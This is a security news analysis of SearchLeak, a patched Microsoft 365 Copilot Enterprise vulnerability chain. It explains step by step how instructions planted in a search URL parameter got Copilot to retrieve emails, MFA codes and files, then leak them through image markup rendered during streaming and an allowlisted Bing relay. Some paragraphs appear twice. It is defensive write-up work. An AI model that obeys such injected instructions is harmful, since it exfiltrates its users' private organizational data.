On June 15, 2026, Varonis Threat Labs disclosed SearchLeak, a patched Microsoft 365 Copilot Enterprise vulnerability chain that could let an attacker steal emails, MFA codes, calendar data, SharePoint files, OneDrive documents, and other indexed organizational content after a victim clicked a crafted Microsoft 365 Search link. The mechanics matter more than the scare headline: this was not “AI gone rogue,” but enterprise search, browser rendering, and allowlisted Microsoft infrastructure being chained into a data-exfiltration path. Microsoft has remediated the flaw, tracked by Varonis as CVE-2026-42824, but SearchLeak is the kind of bug that should make administrators rethink what it means to connect an assistant to everything a user can see. Copilot did not need to break into the tenant; it only needed to be persuaded to use the access it already had.
Microsoft 365 Copilot Enterprise is sold on a simple promise: it can reason over the work graph. It can summarize meetings, find documents, draft responses, answer questions about mail, and stitch together fragments from Outlook, Teams, SharePoint, OneDrive, calendars, and other indexed sources. That is exactly why organizations buy it, and exactly why a vulnerability in its search and response pipeline carries unusual weight.
Traditional enterprise software usually leaks what a particular app can reach. A mail client leaks mail, a document portal leaks documents, and a calendar bug leaks calendar entries. Copilot sits above those application silos, so an exploit against Copilot is not merely an exploit against a chatbot interface; it is an exploit against the aggregation layer Microsoft has placed over the modern workplace.
SearchLeak’s significance is not that attackers could magically read every file in a company. The attack was still constrained by the permissions of the user who clicked the link. But that is a thinner comfort than it sounds, because many organizations have spent years accumulating overexposed SharePoint sites, sprawling Teams workspaces, legacy file permissions, and mailboxes full of authentication codes, password resets, legal threads, HR material, invoices, and executive scheduling details.
In that environment, “whatever the user can access” is not a narrow boundary. It is often a quiet map of the company’s operational nervous system.
That distinction is central to the problem. In old web applications, a query parameter might filter search results, prefill a box, or sort a page. In an AI-assisted interface, that same parameter can become an instruction channel. The humble
The attacker does not need to compromise Microsoft credentials, install a plug-in, or persuade the user to paste text into a chatbot. The user clicks a link pointing at Microsoft’s own cloud interface. That matters because defenders have trained themselves, and their users, to be suspicious of strange domains; SearchLeak exploited the credibility of a legitimate one.
The payload Varonis demonstrated asked Copilot to search the victim’s data and embed retrieved information into an image URL. That sounds like a parlor trick until you remember that browsers and servers have spent decades treating image loads as routine, low-friction events. The attack did not need Copilot to proudly announce that it was sending secrets away. It needed Copilot to produce markup at the wrong time, and it needed the browser ecosystem to do what it normally does.
That is the sort of bug that looks small in isolation and large in context. Modern AI interfaces stream responses because users dislike staring at blank screens while a model “thinks.” The interface feels faster and more conversational when words appear incrementally. But security decisions that are safe at the end of generation may be unsafe during generation.
SearchLeak turned that timing gap into a race condition. If an injected image tag fired before the sanitizer or formatting wrapper caught up, the browser could initiate a request. Once a request has left the page, later making the text look harmless is not enough. The leak has already happened.
This is a reminder that AI safety is not only about model alignment, refusal training, or policy prompts. In production systems, the model is wrapped in web code, rendering pipelines, authentication state, caching layers, content-security policies, browser behavior, and server-side services. A safety promise made at the model layer can be undone by a millisecond of unsafe rendering.
Varonis says the exploit used Bing’s Search by Image behavior as a proxy. The attacker-controlled URL was not directly fetched by Copilot in the obvious way; instead, Bing’s server-side request behavior became the courier. Because the sensitive text had been placed inside the image URL, the attacker could recover it from server logs when the request arrived.
This is not an exotic lesson. Allowlists are only as safe as the behavior of the things on them. If an allowlisted service will fetch attacker-supplied URLs, transform requests, or pass along query strings containing secrets, it can become a tunnel through a policy that looks strict on paper.
The uncomfortable part for Microsoft is that this all happened inside the company’s own ecosystem. The link was Microsoft-flavored. The assistant was Microsoft’s. The search index was Microsoft 365. The bypass reportedly moved through Bing. For defenders, that collapses the easy mental model in which threats are “outside” and trusted cloud platforms are “inside.”
The click was just the trigger. The real danger was that Copilot could be induced to perform a privileged search across business data and then participate in a rendering-and-request chain that smuggled the result outward. The human action was minimal because the machine action was expansive.
Security teams are used to asking whether a user clicked a phishing link. SearchLeak suggests a more complicated question: what did the cloud assistant do after the click, and which internal data sources did it consult on the user’s behalf? That question is harder to answer with traditional web gateway logs or endpoint telemetry.
It is also harder to train away. Users can be told not to click suspicious links, but a Microsoft 365 URL is not inherently suspicious. Long encoded query strings are not meaningful to most employees, and even technical staff are unlikely to manually decode every link that points to a familiar tenant service. The burden cannot sit primarily with the user.
That is why “the AI was tricked” is an incomplete diagnosis. The model followed instructions it should not have followed, but the surrounding application made those instructions actionable. It accepted prompt material from a URL parameter. It streamed unsafe markup. It relied on sanitization that arrived too late. It trusted an allowlisted service that could be repurposed as a relay.
The exploit chain is therefore a critique of architecture, not merely behavior. The assistant is not a standalone oracle; it is a user interface for privileged actions. Once it can search, summarize, retrieve, and compose across Microsoft 365, prompt injection becomes a path to abusing business workflows.
That is the broader shift administrators need to internalize. In older systems, injection usually meant code injection, SQL injection, command injection, or cross-site scripting. In AI-integrated systems, instruction injection can be just as operationally meaningful because instructions are now part of the control plane.
The less comforting news is that SearchLeak follows a pattern. Varonis previously disclosed Reprompt, another single-click Copilot-related attack path in the consumer Copilot context. Separately, EchoLeak, disclosed in 2025, showed how Microsoft 365 Copilot could be vulnerable to zero-click prompt injection and data exfiltration through crafted email content. The individual bugs differ, but the trend is visible: assistants that ingest untrusted content and act over trusted data create strange new seams.
Microsoft is hardly alone here. Any vendor building enterprise AI over mail, documents, tickets, CRM records, source code, and chat history will face similar design pressure. Customers want assistants that can see more, reason more, and do more. Attackers want the same thing.
The industry’s early answer has been guardrails. SearchLeak shows why guardrails cannot be treated as a single product feature. They must exist at the prompt boundary, the data retrieval boundary, the renderer, the network egress layer, the allowlist, and the audit log. If any one layer assumes another layer has already handled the danger, chains like this become possible.
The fact that Copilot operates “as the user” is both a design strength and a governance trap. It avoids handing the assistant a universal skeleton key, but it also inherits every messy permission decision the organization has ever made. If a user has access to 10 years of overshared project folders, Copilot may be able to find and summarize that material faster than the user ever could.
That changes the risk equation for stale permissions. Before AI search, excessive access often hid behind inconvenience. A user might technically be able to browse an old SharePoint hierarchy, but finding the damaging file could take time. Copilot reduces that friction, which means latent permission problems become active exposure problems.
This is where SearchLeak should push IT teams beyond patch management. The patch closes this chain. It does not clean up the data estate Copilot can search. It does not decide whether MFA codes should remain in email. It does not classify sensitive documents or remove abandoned access grants. Those are tenant governance problems, and AI makes them less ignorable.
That does not make detection impossible, but it does make it different. Security teams need visibility into anomalous Copilot search behavior, unusual query parameters, suspiciously encoded prompts, unexpected HTML-like output patterns, and egress paths that move through trusted services. They also need to understand what logs Microsoft exposes for Copilot interactions and whether those logs are detailed enough to reconstruct misuse.
The hardest cases are the ones that look like productivity. A real user might ask Copilot to find an invoice, summarize a thread, or locate a meeting note. A malicious prompt may ask for similar retrieval, then encode the result into a request. The difference is not merely the data accessed, but the intent and the output channel.
This is why AI security will increasingly overlap with data security. If organizations cannot answer who has access to what, where sensitive material lives, and how often it is retrieved, they will struggle to distinguish legitimate Copilot use from abuse. Model-level monitoring is necessary, but it is not sufficient.
That should make developers cautious about treating model output as text simply because it originated in a chat response. If the response can contain markup, links, media references, or embedded resources, it belongs in the same threat model as untrusted user-generated content. Sanitization must happen before rendering, not after a polished answer is assembled.
Streaming complicates this. The product pressure to stream model output is real, and in most cases users prefer it. But every streamed token that reaches a browser before validation is a potential policy decision made too early. The interface needs to be safe during generation, not merely safe after generation.
For admins, the practical lesson is that vendor claims about AI safety should be interrogated at the application layer. Ask how output is rendered. Ask what domains are allowlisted and why. Ask whether the assistant can initiate external fetches, directly or indirectly. Ask whether generated links and media are treated as inert text until proven safe.
But SearchLeak demonstrates the limits of awareness-first security. A link to Microsoft 365 is not enough to set off alarm bells. A long query string is not readable to most employees. And if the attack succeeds through a legitimate enterprise assistant, the user may not see a conventional warning sign at all.
The better response is layered. Administrators should verify Microsoft’s remediation, monitor for suspicious Copilot Search usage, review content-security assumptions, reduce oversharing in Microsoft 365, and treat AI assistants as high-value interfaces that deserve dedicated logging and policy controls. Security vendors, meanwhile, need to stop treating AI activity as an odd corner of SaaS monitoring and start treating it as a primary channel for data movement.
Users still matter, but they should not be the final safety mechanism for an architecture that can search an organization on their behalf.
Copilot’s Greatest Strength Is Also Its Most Dangerous Permission Boundary
Microsoft 365 Copilot Enterprise is sold on a simple promise: it can reason over the work graph. It can summarize meetings, find documents, draft responses, answer questions about mail, and stitch together fragments from Outlook, Teams, SharePoint, OneDrive, calendars, and other indexed sources. That is exactly why organizations buy it, and exactly why a vulnerability in its search and response pipeline carries unusual weight.Traditional enterprise software usually leaks what a particular app can reach. A mail client leaks mail, a document portal leaks documents, and a calendar bug leaks calendar entries. Copilot sits above those application silos, so an exploit against Copilot is not merely an exploit against a chatbot interface; it is an exploit against the aggregation layer Microsoft has placed over the modern workplace.
SearchLeak’s significance is not that attackers could magically read every file in a company. The attack was still constrained by the permissions of the user who clicked the link. But that is a thinner comfort than it sounds, because many organizations have spent years accumulating overexposed SharePoint sites, sprawling Teams workspaces, legacy file permissions, and mailboxes full of authentication codes, password resets, legal threads, HR material, invoices, and executive scheduling details.
In that environment, “whatever the user can access” is not a narrow boundary. It is often a quiet map of the company’s operational nervous system.
The Attack Began With a Link That Looked Like It Belonged
The first stage of SearchLeak used what Varonis calls Parameter-to-Prompt Injection, or P2P. The concept is disarmingly simple: a crafted Microsoft 365 Search URL includes attacker-controlled instructions inside a query parameter. When the victim opens the link, Copilot treats those embedded words not merely as search text, but as a prompt to execute.That distinction is central to the problem. In old web applications, a query parameter might filter search results, prefill a box, or sort a page. In an AI-assisted interface, that same parameter can become an instruction channel. The humble
q= field, long treated as a boring bit of URL plumbing, becomes a way to smuggle intent into an assistant.The attacker does not need to compromise Microsoft credentials, install a plug-in, or persuade the user to paste text into a chatbot. The user clicks a link pointing at Microsoft’s own cloud interface. That matters because defenders have trained themselves, and their users, to be suspicious of strange domains; SearchLeak exploited the credibility of a legitimate one.
The payload Varonis demonstrated asked Copilot to search the victim’s data and embed retrieved information into an image URL. That sounds like a parlor trick until you remember that browsers and servers have spent decades treating image loads as routine, low-friction events. The attack did not need Copilot to proudly announce that it was sending secrets away. It needed Copilot to produce markup at the wrong time, and it needed the browser ecosystem to do what it normally does.
The Guardrail Failed in the Gap Between Thinking and Rendering
Microsoft’s safety model did not simply forget that generated HTML can be dangerous. According to Varonis, Copilot had a mitigation intended to wrap risky output so the browser would treat it as text rather than active markup. The failure was temporal: the wrapping reportedly happened after Copilot finished generating, while raw HTML could briefly appear in the Document Object Model during the streaming phase.That is the sort of bug that looks small in isolation and large in context. Modern AI interfaces stream responses because users dislike staring at blank screens while a model “thinks.” The interface feels faster and more conversational when words appear incrementally. But security decisions that are safe at the end of generation may be unsafe during generation.
SearchLeak turned that timing gap into a race condition. If an injected image tag fired before the sanitizer or formatting wrapper caught up, the browser could initiate a request. Once a request has left the page, later making the text look harmless is not enough. The leak has already happened.
This is a reminder that AI safety is not only about model alignment, refusal training, or policy prompts. In production systems, the model is wrapped in web code, rendering pipelines, authentication state, caching layers, content-security policies, browser behavior, and server-side services. A safety promise made at the model layer can be undone by a millisecond of unsafe rendering.
Bing Became the Trusted Courier
The third stage of the chain abused a path through Bing’s image-search infrastructure. Microsoft 365 Copilot restricted which external image domains could be reached, a sensible control meant to prevent exactly the kind of direct exfiltration attackers want. But Bing, as a Microsoft service, was reportedly allowlisted under the relevant Content Security Policy.Varonis says the exploit used Bing’s Search by Image behavior as a proxy. The attacker-controlled URL was not directly fetched by Copilot in the obvious way; instead, Bing’s server-side request behavior became the courier. Because the sensitive text had been placed inside the image URL, the attacker could recover it from server logs when the request arrived.
This is not an exotic lesson. Allowlists are only as safe as the behavior of the things on them. If an allowlisted service will fetch attacker-supplied URLs, transform requests, or pass along query strings containing secrets, it can become a tunnel through a policy that looks strict on paper.
The uncomfortable part for Microsoft is that this all happened inside the company’s own ecosystem. The link was Microsoft-flavored. The assistant was Microsoft’s. The search index was Microsoft 365. The bypass reportedly moved through Bing. For defenders, that collapses the easy mental model in which threats are “outside” and trusted cloud platforms are “inside.”
One Click Is the Wrong Metric, but the Right Alarm Bell
Much of the coverage of SearchLeak emphasizes that it required only one click. That is fair, because one-click attacks are easier to operationalize than attacks that require a user to approve permissions, install software, or copy and paste a malicious prompt. But “one click” can also undersell the more important issue.The click was just the trigger. The real danger was that Copilot could be induced to perform a privileged search across business data and then participate in a rendering-and-request chain that smuggled the result outward. The human action was minimal because the machine action was expansive.
Security teams are used to asking whether a user clicked a phishing link. SearchLeak suggests a more complicated question: what did the cloud assistant do after the click, and which internal data sources did it consult on the user’s behalf? That question is harder to answer with traditional web gateway logs or endpoint telemetry.
It is also harder to train away. Users can be told not to click suspicious links, but a Microsoft 365 URL is not inherently suspicious. Long encoded query strings are not meaningful to most employees, and even technical staff are unlikely to manually decode every link that points to a familiar tenant service. The burden cannot sit primarily with the user.
This Is Prompt Injection Wearing a Suit and Badge
Prompt injection has often been discussed as a chatbot novelty: hide instructions in a web page, trick an assistant, make it ignore prior rules. SearchLeak belongs to a more mature and more troubling category. It shows prompt injection interacting with enterprise identity, browser security, server-side services, and indexed corporate data.That is why “the AI was tricked” is an incomplete diagnosis. The model followed instructions it should not have followed, but the surrounding application made those instructions actionable. It accepted prompt material from a URL parameter. It streamed unsafe markup. It relied on sanitization that arrived too late. It trusted an allowlisted service that could be repurposed as a relay.
The exploit chain is therefore a critique of architecture, not merely behavior. The assistant is not a standalone oracle; it is a user interface for privileged actions. Once it can search, summarize, retrieve, and compose across Microsoft 365, prompt injection becomes a path to abusing business workflows.
That is the broader shift administrators need to internalize. In older systems, injection usually meant code injection, SQL injection, command injection, or cross-site scripting. In AI-integrated systems, instruction injection can be just as operationally meaningful because instructions are now part of the control plane.
Microsoft Patched the Bug, but the Pattern Will Outlive the CVE
The good news is straightforward: Microsoft has patched SearchLeak. Organizations using Microsoft 365 Copilot Enterprise should not read this as a live, unmitigated warning to panic. The responsible response is to verify remediation, review telemetry, and use the incident as a forcing function for AI-era controls.The less comforting news is that SearchLeak follows a pattern. Varonis previously disclosed Reprompt, another single-click Copilot-related attack path in the consumer Copilot context. Separately, EchoLeak, disclosed in 2025, showed how Microsoft 365 Copilot could be vulnerable to zero-click prompt injection and data exfiltration through crafted email content. The individual bugs differ, but the trend is visible: assistants that ingest untrusted content and act over trusted data create strange new seams.
Microsoft is hardly alone here. Any vendor building enterprise AI over mail, documents, tickets, CRM records, source code, and chat history will face similar design pressure. Customers want assistants that can see more, reason more, and do more. Attackers want the same thing.
The industry’s early answer has been guardrails. SearchLeak shows why guardrails cannot be treated as a single product feature. They must exist at the prompt boundary, the data retrieval boundary, the renderer, the network egress layer, the allowlist, and the audit log. If any one layer assumes another layer has already handled the danger, chains like this become possible.
The Enterprise Search Box Has Become a Security Principal
Windows and Microsoft 365 administrators should think of Copilot less like a productivity feature and more like a new class of security principal. It does not have independent human intent, but it can exercise delegated access, query sensitive repositories, and transform retrieved data into new outputs. That combination deserves the same suspicion normally reserved for automation accounts and privileged service identities.The fact that Copilot operates “as the user” is both a design strength and a governance trap. It avoids handing the assistant a universal skeleton key, but it also inherits every messy permission decision the organization has ever made. If a user has access to 10 years of overshared project folders, Copilot may be able to find and summarize that material faster than the user ever could.
That changes the risk equation for stale permissions. Before AI search, excessive access often hid behind inconvenience. A user might technically be able to browse an old SharePoint hierarchy, but finding the damaging file could take time. Copilot reduces that friction, which means latent permission problems become active exposure problems.
This is where SearchLeak should push IT teams beyond patch management. The patch closes this chain. It does not clean up the data estate Copilot can search. It does not decide whether MFA codes should remain in email. It does not classify sensitive documents or remove abandoned access grants. Those are tenant governance problems, and AI makes them less ignorable.
The Detection Problem Is Not Just Malware Without Malware
SearchLeak is unnerving because it does not resemble the kind of intrusion many tools are optimized to catch. There is no payload dropped on disk. There is no obvious malware beacon. There may be no suspicious login from a foreign IP address. The user interacts with a legitimate Microsoft cloud service, and Microsoft cloud services talk to each other.That does not make detection impossible, but it does make it different. Security teams need visibility into anomalous Copilot search behavior, unusual query parameters, suspiciously encoded prompts, unexpected HTML-like output patterns, and egress paths that move through trusted services. They also need to understand what logs Microsoft exposes for Copilot interactions and whether those logs are detailed enough to reconstruct misuse.
The hardest cases are the ones that look like productivity. A real user might ask Copilot to find an invoice, summarize a thread, or locate a meeting note. A malicious prompt may ask for similar retrieval, then encode the result into a request. The difference is not merely the data accessed, but the intent and the output channel.
This is why AI security will increasingly overlap with data security. If organizations cannot answer who has access to what, where sensitive material lives, and how often it is retrieved, they will struggle to distinguish legitimate Copilot use from abuse. Model-level monitoring is necessary, but it is not sufficient.
The Browser Is Still Part of the Attack Surface
SearchLeak also punctures the illusion that AI security is somehow separate from ordinary web security. The chain depended on an HTML rendering race condition and a Content Security Policy bypass. Those are not futuristic concerns. They are familiar web application security problems, reframed by an AI interface that generated the content being rendered.That should make developers cautious about treating model output as text simply because it originated in a chat response. If the response can contain markup, links, media references, or embedded resources, it belongs in the same threat model as untrusted user-generated content. Sanitization must happen before rendering, not after a polished answer is assembled.
Streaming complicates this. The product pressure to stream model output is real, and in most cases users prefer it. But every streamed token that reaches a browser before validation is a potential policy decision made too early. The interface needs to be safe during generation, not merely safe after generation.
For admins, the practical lesson is that vendor claims about AI safety should be interrogated at the application layer. Ask how output is rendered. Ask what domains are allowlisted and why. Ask whether the assistant can initiate external fetches, directly or indirectly. Ask whether generated links and media are treated as inert text until proven safe.
The Old Advice Still Helps, but It No Longer Fits the Whole Threat
There is a temptation after every link-triggered exploit to fall back on user awareness training. Do not click strange links. Inspect URLs. Report unusual behavior. Those are still useful habits, and Varonis’ own defensive guidance includes watching for suspicious Microsoft 365 Search URLs with encoded payloads in the query parameter.But SearchLeak demonstrates the limits of awareness-first security. A link to Microsoft 365 is not enough to set off alarm bells. A long query string is not readable to most employees. And if the attack succeeds through a legitimate enterprise assistant, the user may not see a conventional warning sign at all.
The better response is layered. Administrators should verify Microsoft’s remediation, monitor for suspicious Copilot Search usage, review content-security assumptions, reduce oversharing in Microsoft 365, and treat AI assistants as high-value interfaces that deserve dedicated logging and policy controls. Security vendors, meanwhile, need to stop treating AI activity as an odd corner of SaaS monitoring and start treating it as a primary channel for data movement.
Users still matter, but they should not be the final safety mechanism for an architecture that can search an organization on their behalf.
SearchLeak Turns AI Governance From Policy Talk Into Patch Tuesday Reality
The immediate lesson from SearchLeak is narrow enough to act on, but broad enough to change roadmaps. This was a patched vulnerability chain in Microsoft 365 Copilot Enterprise Search, not a reason to ban every assistant or declare enterprise AI unusable. It is, however, a strong argument that AI rollout plans must be tied to data hygiene, logging, and application security rather than handled as a licensing and adoption exercise.- Organizations using Microsoft 365 Copilot Enterprise should confirm that Microsoft’s remediation for SearchLeak has been applied and review whether any compensating controls are needed.
- Security teams should monitor Microsoft 365 Search URLs for unusually long or encoded
qparameters that appear to contain instructions, markup, or data-exfiltration patterns. - Administrators should audit overshared SharePoint, OneDrive, Teams, and mailbox content because Copilot can make excessive access easier to exploit.
- Developers building AI interfaces should treat streamed model output as untrusted until it has been sanitized before rendering, not after generation completes.
- Defenders should review allowlisted services that can fetch attacker-controlled URLs, because trusted infrastructure can become an exfiltration relay.
- Enterprises should assume future AI vulnerabilities will be chains, not single bugs, and should test controls across identity, retrieval, rendering, and network egress together.
References
- Primary source: Mashable
Published: Tue, 16 Jun 2026 20:32:19 GMT
This Copilot vulnerability could expose emails, 2FA codes, and other sensitive data | Mashable
A newly discovered Microsoft Copilot vulnerability enables hackers to access your email and other sensitive data.mashable.com - Related coverage: varonis.com
SearchLeak: How We Turned M365 Copilot Into a One-Click Data Exfiltration Weapon
Varonis Threat Labs discovered SearchLeak, a critical vulnerability chain in Microsoft 365 Copilot Enterprise that allows an attacker to steal sensitive data — MFA codes, email messages, meeting details, and private organizational files — with a single click.www.varonis.com
- Related coverage: windowscentral.com
Patched Microsoft Copilot Reprompt exploit stole user data | Windows Central
Varonis Threat Labs has published a report detailing a now-patched security exploit in Microsoft Copilot, allowing attackers to silently steal user data with a single link.www.windowscentral.com - Related coverage: techrepublic.com
‘Reprompt’ Attack Explained: How Microsoft Copilot Data Was Stolen
Varonis found a “Reprompt” attack that let a single link hijack Microsoft Copilot Personal sessions and exfiltrate data; Microsoft patched it in January 2026.www.techrepublic.com
- Related coverage: venturebeat.com
Microsoft patched a Copilot Studio prompt injection. The data exfiltrated anyway | VentureBeat
Microsoft assigned CVE-2026-21520 to a Copilot Studio prompt injection vulnerability and patched it in January — but in Capsule Security's testing, data exfiltrated anyway. Here's what security directors need to audit now.venturebeat.com - Related coverage: techradar.com
Microsoft Copilot AI attack took just a single click to compromise users - here's what we know | TechRadar
Varonis finds a new way to carry out prompt injection attackswww.techradar.com
- Related coverage: thenextweb.com
A single click on a Microsoft link could have drained your inbox. Here's how SearchLeak worked.
Varonis chained three bugs in Microsoft 365 Copilot Enterprise Search into a one-click data theft path that bypassed phishing filters and CSP protections.thenextweb.com - Related coverage: utopiats.com
One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes · Utopia Tech
Security researchers at Varonis Threat Labs discovered a critical vulnerability chain called SearchLeak that could allow attackers to exfiltrate sensitive data from Microsoft 365 Copilot Enterprise Search through a single click on a legitimate Microsoft domain link. The attack bypassed...utopiats.com - Related coverage: tomsguide.com
This Microsoft Copilot vulnerability only requires a single click, and your personal data could be stolen | Tom's Guide
The Reprompt attack uses Copilot to steal victims personal information.www.tomsguide.com - Related coverage: labs.cloudsecurityalliance.org
CSA research note M365 Copilot CVE 2026 24299 20260505 csa styled
PDF documentlabs.cloudsecurityalliance.org